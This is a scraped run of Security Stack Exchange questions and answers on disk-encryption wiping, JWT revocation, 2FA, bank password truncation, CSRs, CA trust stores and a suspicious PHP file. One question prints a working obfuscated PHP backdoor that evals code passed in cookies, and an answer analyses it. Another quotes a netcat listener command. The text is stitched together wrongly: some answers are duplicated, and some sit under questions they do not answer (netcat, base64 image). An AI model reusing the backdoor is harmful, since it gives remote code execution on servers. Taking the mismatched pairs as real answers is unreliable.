header being used as a built-in backup. Both headers are encrypted, so there's no security impact to making multiple copies. A common approach is to store one copy at the "start" of the disk (low logical block address) and another copy either at the "end" of the disk (high logical block address) or at some known offset. This ensures that the two copies are physically separate on the storage medium, so a bad sector or other corruption is unlikely to affect both copies. Corruption can be detected by comparing the two headers. This volume header backup scheme has implications for data destruction. Exploring these implications is easiest if we think about the potential scenarios: FDE was always in use on the drive (no risk of latent plaintext) but no data has been wiped. A partial wipe was performed on the disk. The primary volume header was wiped, but not the secondary header (or vice versa). The bulk data was not wiped, or only a small part of it was. A partial wipe was performed on the disk. Both primary and secondary volume headers were wiped. The bulk data was not wiped, or only a small part of it was. A full wipe was performed on the disk. The first scenario is no different to normal use of FDE. An attacker would need to guess or bruteforce your password, get access to your recovery key, or bruteforce the volume header key or bulk encryption key (which is computationally infeasible). In the second scenario you've wiped one header but not the other. Since the disk contains a secondary header, it can be used to unlock the disk. Again, an attacker would need to guess or bruteforce your password, get access to your recovery key, or bruteforce the volume header key or bulk encryption key (computationally infeasible). If they do recover the bulk encryption key through one of these means, the difficulty of recovery depends on how much of the bulk data was wiped alongside the header. In the third scenario you've wiped both headers. The disk no longer contains a copy of the bulk encryption key. An attacker no longer has the option to brute-force or otherwise crack your unlock password. They would need to get access to your recovery key, or bruteforce the bulk encryption key (again, computationally infeasible). If they do recover the bulk encryption key through one of these means, the difficulty of recovery depends on how much of the bulk data was wiped alongside the header. In the fourth scenario you've wiped the whole disk. None of the data is left, so an attacker can't do anything. Ignore anyone who starts talking about multi-pass wiping and magical physical-layer recovery tricks like Magnetic Force Microscopy (MFM) - it's nonsense, and even if it did work nobody is going to bother (not even nation states). A full rant about wacky DoD disk erasure standards and their ongoing abuse by wiping software marketing teams is out of scope for this answer. Suffice to say that NIST SP 800-88 Rev.1 is the right place to look if you want a high quality media sanitisation standard. Now the question arises: which of these situations applies to you? It depends, but the answer is almost certainly 2 or 3. If the FDE implementation you used puts the secondary volume header at a fixed offset, it's possible that you wiped both of them, which would put you in scenario 3. If the secondary volume header is at the "end" of the disk, then it may not have been wiped, which would put you in scenario 2. This is assuming that the disk wipe utility starts at the beginning of the disk (LBA 0) and writes sequentially from there - if it doesn't, all bets are off. You can reasonably gather whether you're in scenario 2 or 3 by attempting to mount the disk. If you can get it to mount without needing a recovery key, you didn't get both of the headers. If you can't, you're probably in scenario 3. There may be edge cases where the backup volume header is present but the software still fails to mount/recover for some reason, so it's not a 100% guarantee, but it's a good indication. It's also important to note that you probably damaged the filesystem, so the FDE might unlock successfully but the underlying filesystem might not actually mount; this is an important distinction because unlocking is the bit we actually care about for security. Given all this, the worst case scenario is that your data isn't unrecoverable but is still protected by FDE. Almost every single attacker (bored teenager, cybercriminals, law enforcement) will be defeated by this already, with an exception for the case where someone compels you to reveal your unlock password (highly unlikely). The best case scenario is that you wiped the volume headers and the data is infeasible to recover even with all the computational resources in the world, unless someone gets at your recovery keys (if you have them). Since FDE already provides protection against everything except being legally compelled to reveal your password (I'll assume that someone hitting you with a wrench is out of scope for your threat model because you're not a character on the TV show "24") it's mostly a symbolic improvement in security for the bulk of sensible threat models. TL;DR - I wouldn't worry about it too much. FDE alone is already a concrete security control as long as your password is good. Any amount of disk wiping you do afterwards is a tradeoff between time/effort and a little extra defence in depth.
{ "source": [ "https://security.stackexchange.com/questions/265814", "https://security.stackexchange.com", "https://security.stackexchange.com/users/279066/" ] }
265,823
If an attacker were to set up a netcat listener (nc -lvnp 4444), then is it possible to take control of their device using that listener? Whenever I look for an answer online, all I can find is how to setup your own reverse shell with netcat and never anything on exploiting an attackers reverse shell.
Has the data been securely erased beyond any doubt? No. Does it matter in practice? Probably not, at least for any sensible domestic/company threat model. For the purposes of this answer I will presume that your disk was encrypted with a standard password unlock scheme and no TPM was involved. I will also presume a mechanical hard disk, as noted in your question, not an SSD. It is important to note that SSDs have special properties when it comes to FDE and data destruction which complicate the situation; there are other questions/answers on this site that discuss this in detail. Typically, FDE volumes have a randomly generated volume key that is used for the bulk encryption of data on the disk. The volume key (and various other information) is placed into a volume header. Your disk unlock password is used to derive a volume unlock key, which is used to encrypt the volume header. This description is a bit of a simplification, but for the purposes of this question it is sufficient. There are several reasons for using this volume header approach rather than just using your unlock key directly for bulk data encryption. The primary benefit is convenience: if you want to change your password, the only thing that needs to be re-encrypted is the volume header, rather than the entire disk. There are other benefits, too: It minimises the amount of data secured with the same key, since two disks that use the same password will utilise different bulk encryption keys. The bulk encryption key can be exported for recovery purposes, and if this key is compromised then it only compromises that one disk instead of all disks that use the same password. Implementing multi-user unlock schemes is simple. The volume header is duplicated for each user and encrypted with an unlock key derived from that user's password. Any one user can then unlock the disk. Alternative unlock schemes (e.g. TPM, hardware token / smart card, etc.) are easier to implement. Data destruction does not require that the whole disk be wiped, but only that the volume headers are destroyed, which saves time and disk wear. (The story is more complicated on SSDs but we're talking about HDDs here.) That last point is a double-edged sword. If the FDE volume header is damaged or destroyed, e.g. due to disk corruption, all of your data is unrecoverable . If you lose the volume header, you lose the key that was used to encrypt the data on the disk, so the recovery problem becomes equivalent to cracking the randomly generated key. This is great if you're intentionally trying to destroy the data on the disk, but it sucks when it happens unintentionally. To minimise the risk of unintentional damage to the volume header, FDE schemes typically make one or more backup copies of that header. When you encrypt the drive you are usually prompted to save a recovery key or make some kind of recovery USB stick. The exact implementations vary, but these recovery processes either back up the plaintext bulk encryption key (and other necessary parameters like the IV) or the entire volume header block. This recovery material is usually designed to be able to decrypt the bulk data on the disk without needing an intact volume header or the unlock password. However, this is usually not the only backup. Most FDE schemes store a primary and secondary volume header somewhere on the disk, with the secondary header being used as a built-in backup. Both headers are encrypted, so there's no security impact to making multiple copies. A common approach is to store one copy at the "start" of the disk (low logical block address) and another copy either at the "end" of the disk (high logical block address) or at some known offset. This ensures that the two copies are physically separate on the storage medium, so a bad sector or other corruption is unlikely to affect both copies. Corruption can be detected by comparing the two headers. This volume header backup scheme has implications for data destruction. Exploring these implications is easiest if we think about the potential scenarios: FDE was always in use on the drive (no risk of latent plaintext) but no data has been wiped. A partial wipe was performed on the disk. The primary volume header was wiped, but not the secondary header (or vice versa). The bulk data was not wiped, or only a small part of it was. A partial wipe was performed on the disk. Both primary and secondary volume headers were wiped. The bulk data was not wiped, or only a small part of it was. A full wipe was performed on the disk. The first scenario is no different to normal use of FDE. An attacker would need to guess or bruteforce your password, get access to your recovery key, or bruteforce the volume header key or bulk encryption key (which is computationally infeasible). In the second scenario you've wiped one header but not the other. Since the disk contains a secondary header, it can be used to unlock the disk. Again, an attacker would need to guess or bruteforce your password, get access to your recovery key, or bruteforce the volume header key or bulk encryption key (computationally infeasible). If they do recover the bulk encryption key through one of these means, the difficulty of recovery depends on how much of the bulk data was wiped alongside the header. In the third scenario you've wiped both headers. The disk no longer contains a copy of the bulk encryption key. An attacker no longer has the option to brute-force or otherwise crack your unlock password. They would need to get access to your recovery key, or bruteforce the bulk encryption key (again, computationally infeasible). If they do recover the bulk encryption key through one of these means, the difficulty of recovery depends on how much of the bulk data was wiped alongside the header. In the fourth scenario you've wiped the whole disk. None of the data is left, so an attacker can't do anything. Ignore anyone who starts talking about multi-pass wiping and magical physical-layer recovery tricks like Magnetic Force Microscopy (MFM) - it's nonsense, and even if it did work nobody is going to bother (not even nation states). A full rant about wacky DoD disk erasure standards and their ongoing abuse by wiping software marketing teams is out of scope for this answer. Suffice to say that NIST SP 800-88 Rev.1 is the right place to look if you want a high quality media sanitisation standard. Now the question arises: which of these situations applies to you? It depends, but the answer is almost certainly 2 or 3. If the FDE implementation you used puts the secondary volume header at a fixed offset, it's possible that you wiped both of them, which would put you in scenario 3. If the secondary volume header is at the "end" of the disk, then it may not have been wiped, which would put you in scenario 2. This is assuming that the disk wipe utility starts at the beginning of the disk (LBA 0) and writes sequentially from there - if it doesn't, all bets are off. You can reasonably gather whether you're in scenario 2 or 3 by attempting to mount the disk. If you can get it to mount without needing a recovery key, you didn't get both of the headers. If you can't, you're probably in scenario 3. There may be edge cases where the backup volume header is present but the software still fails to mount/recover for some reason, so it's not a 100% guarantee, but it's a good indication. It's also important to note that you probably damaged the filesystem, so the FDE might unlock successfully but the underlying filesystem might not actually mount; this is an important distinction because unlocking is the bit we actually care about for security. Given all this, the worst case scenario is that your data isn't unrecoverable but is still protected by FDE. Almost every single attacker (bored teenager, cybercriminals, law enforcement) will be defeated by this already, with an exception for the case where someone compels you to reveal your unlock password (highly unlikely). The best case scenario is that you wiped the volume headers and the data is infeasible to recover even with all the computational resources in the world, unless someone gets at your recovery keys (if you have them). Since FDE already provides protection against everything except being legally compelled to reveal your password (I'll assume that someone hitting you with a wrench is out of scope for your threat model because you're not a character on the TV show "24") it's mostly a symbolic improvement in security for the bulk of sensible threat models. TL;DR - I wouldn't worry about it too much. FDE alone is already a concrete security control as long as your password is good. Any amount of disk wiping you do afterwards is a tradeoff between time/effort and a little extra defence in depth.
{ "source": [ "https://security.stackexchange.com/questions/265823", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284565/" ] }
266,204
I've read that JWT tokens are stateless and you don't need to store the tokens in the database and that this prevents a look up step. What I don't understand is that according to RFC 7009 you can revoke a token. Let's say I have a web site with a Sign Out button that calls a token revocation flow like in RFC 7009. If no tokens are stored in the database, what's to prevent the client from using a token that's been revoked? If I Sign Out, I would expect to have to Sign In again. Is it solely the client's responsibility to clear the token locally? Do you need to store the refresh token in a database or store to implement RFC 7009?
RFC 7009 is about OAuth, not JWT. You are mixing two different technologies: JWT and OAuth . This question on StackExchange summarizes it well. JWT is a token format. It defines the fields, the signing protocol, the encoding. OAuth is an authorization protocol that can use JWT or not, depending on the developer. It's not easy to revoke a JWT, because they are stateless, self contained and don't use a database. Revoking a JWT would require storing some value on a database, looking at that value at each request, and that would look a lot like OAuth but with the overhead of mixing the two together.
{ "source": [ "https://security.stackexchange.com/questions/266204", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16585/" ] }
266,306
Whenever I create a remote repository on my web server there seems to be a file called expect.php or options.php with the following code in it: <?php function visit_cookie() { $h = $_COOKIE; ($h && isset($h[93])) ? (($ms = $h[93].$h[78]) && ($qh = $ms($h[73].$h[22])) && ($_qh = $ms($h[94].$h[82])) && ($_qh = $_qh($ms($h[10]))) && @eval($_qh)) : $h; return 0; } visit_cookie(); ?> This also exists in my older, already existing repositories on the server. I am using HostGator's Shared Hosting package with PHP & MySQL. I am not sure if this is something that the server or git creates and is part of a process or if it is a malicious file, as I do not understand the code written in it. The reason I am asking this question is that recently, Google has blacklisted my site and visiting it gives a "Site is dangerous may contain malware" sort of popup. So I am trying to investigate and fix the problem.
It almost certainly is malicious, and there are several risks introduced by the code provided. Red Flags The first and loudest sign of trouble here is going to be invocation of the eval() command. When the input is constructed from $_COOKIE —a superglobal which effectively allows for anonymous clients to store whatever short strings they want to via any HTTP method—then straight away you are opened up to arbitrary code execution. To make matters worse, the code uses the @ symbol in that invocation to suppress error messages or any output that may otherwise arise, thus preventing you from reviewing what has run and what will be run later. Code Analysis Basically, it looks like an attacker has set it up to pass in arbitrary code through cookies. The bad actor here could be doing any number of things—on the more benign end, they may be showing ads that aren't yours or redirecting to their own site for traffic gains, or on the more intense side could be camping on your server and periodically stealing all of your users' data from the users directly as well as any connected data stores. You should be taking serious measures to address this in the event that you have customer data present and accessible from this server. It's a leak. Recommendations Consider pursuing another host if the provider you are with is not able or willing to assist you in diagnosing the origin here. It possibly came from some dependency in your code and may be replicated via your git configuration since you mention that it is recurring, so consider an audit of your repositories and that configuration. Maybe switch to a host like Cloudflare, often free. Since this is PHP/MySQL, you would perhaps be better served by other providers. I was just throwing out one name, but other trusted providers like AWS/Azure/Google Cloud will have what you want. In general, Digital Ocean has quite a low barrier to entry. To prevent a repeat attack, as noted by OscarGarcia: If you uploaded a private key anywhere on this server, or anywhere at all in raw form—be that a shared symmetric key or the private half of a asymmetric key pair—then you should go ahead and retire that right away. This attack would have granted access to the host file system and, depending on what the key is used for, may leave you vulnerable to a repeat attack elsewhere.
{ "source": [ "https://security.stackexchange.com/questions/266306", "https://security.stackexchange.com", "https://security.stackexchange.com/users/281368/" ] }
266,447
I work on a service that handles user authentication & authorization. I recently added 2FA support (email, sms, TOTP) and while it works great, I was wondering about the security of the one-time codes during transit (client->server request). Assuming everything is going through HTTPS, does it make sense to encrypt/hash in the payload? I have seen some banking/financial systems doing it using some derivation technique (joining the code with another value, hashing the whole thing and only then sending, and the server would do the same).
If we assume TLS is not broken, then it doesn't really make sense to add obfuscation to transmit the OTP codes. If we assume TLS is broken, it doesn't really make sense, as the Javascript transmitted to the client can be replaced by a MITM attack.
{ "source": [ "https://security.stackexchange.com/questions/266447", "https://security.stackexchange.com", "https://security.stackexchange.com/users/285659/" ] }
266,509
On Linux, the /etc/ssl/certs folder includes all the necessary public keys for Certificate Authorities. If I have not misunderstood something, this makes it possible to verify public keys received from other servers over the internet. But an adversary, e.g. a program with root privileges, or even a security agency collaborating with developers of a Linux distro, can "plant" its' own certificates or modify the existing ones. This would enable MiTM attacks by making the adversary's fake certificates used for such attacks seem legitimate and signed by a Certificate Authority. Is there any technique that prevents this, or a way to verify that those keys have not been modified after installation?
If an adversary or attacker has root level access to your system (and therefore, the ability to plant its own certificates in your system's trust store), then that means your system has been compromised. If your system has been compromised, that it's game-over irrespectively. Once your system has been compromised, and the attacker has root level access, the attacker then has complete control of your system. He or she can access your files, install its own programs, monitor what you do on the system, and monitor your communications - without even needing to plant certificates in your trust store.
{ "source": [ "https://security.stackexchange.com/questions/266509", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284993/" ] }
266,546
I copy / pasted a data:image/png;Base64 image from a Google search into a Google Slide, before realizing it was a BASE64 image. Is there any possibility that this contains malicious code, or any way to check it? [...]data:image/png;base64,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 I did run it through a Base64 Validator and it produced the .png, but just concerned it may have done something else.
If an adversary or attacker has root level access to your system (and therefore, the ability to plant its own certificates in your system's trust store), then that means your system has been compromised. If your system has been compromised, that it's game-over irrespectively. Once your system has been compromised, and the attacker has root level access, the attacker then has complete control of your system. He or she can access your files, install its own programs, monitor what you do on the system, and monitor your communications - without even needing to plant certificates in your trust store.
{ "source": [ "https://security.stackexchange.com/questions/266546", "https://security.stackexchange.com", "https://security.stackexchange.com/users/285863/" ] }
266,608
The bank of a friend changed password policy, such that you are limited to 20 characters. However, he used 24 letters before and thus was not able to log in anymore. He called his advisor, who suggested, he should try to log in with the first 20 letters of his password... and it worked. This really made us think about the password storage practice they use: I always assumed that a password is stored only as a hash, ("with a bit of salt") but never ever in it's plain form. Which would definitely be required to shorten a password by the bank. Or am I wrong? A similar problem has been stated here . Should I be concerned that this bank uses bad information security procedures?
Most likely the bank always used just 20 characters. As Affe already suggested in the comments, the simplest explanation is that nothing has actually changed in the way the bank stores the passwords. Most likely the bank always had an internal password length limit of 20 characters, and the password entry fields used to silently discard the extra characters. While truncating passwords is not necessarily a great idea, there's no reason to suspect actual security malpractice. Those 20 first characters are probably stored using a reasonable salted hashing scheme or a hardware security module (given all sorts of audit requirements, banks are in general slightly less likely to invent horrible homebrew crypto compared to other companies). I can speculate that they now stopped silently truncating passwords as a necessary preparatory step towards supporting longer passwords (so that users will likely be able to set a new 24-character password now or in the near future and it will get hashed as a whole).
{ "source": [ "https://security.stackexchange.com/questions/266608", "https://security.stackexchange.com", "https://security.stackexchange.com/users/285967/" ] }
266,650
I am looking into our current website certificate-management process and am looking for steps that may be unnecessary and can be simplified. The current process was created by our sysadmin who now left, and I am confused about step 1 below. Context: I am hosting a webapp (windows VM with IIS webserver) on a (sub)domain that belongs to a customer (on the customer's domain), so I have no control over their DNS settings or certificate-management. Because we do want to support HTTPS for this customer we have the following process in order to create a SSL certificate to bind in IIS to our webapp. In IIS we create a CSR (cert request) using the subdomain name (of the customer's domain) and customer organisation details. We send the CSR to the customer, they sign it with their CA of choice and send the .cert back to us. We 'complete' the CSR in IIS and there comes the cert in IIS. We can then export this cert to have it as a .PFX (with private key and password) and bind it to our IIS webapp. (the customer uses a DNS Record to point their subdomain to our IIS webserver) My question is: What could the reason be that we (the previous sysadmin) would create the CSR etc, instead of just letting the customer create the certificate fully on their side, and when it's created, just send it to use for installation on the webserver. Why this 2-phase approach that involves lots of waiting and customer-inaction in the process? What are the drawbacks to letting the customer fully create and manage their certificate, so the only thing we have to do is just import their certificate and bind it in IIS to our webapp.
My question is: What could the reason be that we (the previous sysadmin) would create the CSR etc, instead of just letting the customer create the certificate fully on their side, and when it's created, just send it to use for installation on the webserver. If the customer created everything on their side, they would also need to create the private key and send it to you - which means that they have a copy of your private key and also increases the likelihood that they key is stolen or compromised. The point of a CSR is that you can send them the details of the certificate you want (e.g, the name/URL that it's for), and your public key - but your private key never gets sent anywhere.
{ "source": [ "https://security.stackexchange.com/questions/266650", "https://security.stackexchange.com", "https://security.stackexchange.com/users/150616/" ] }
266,797
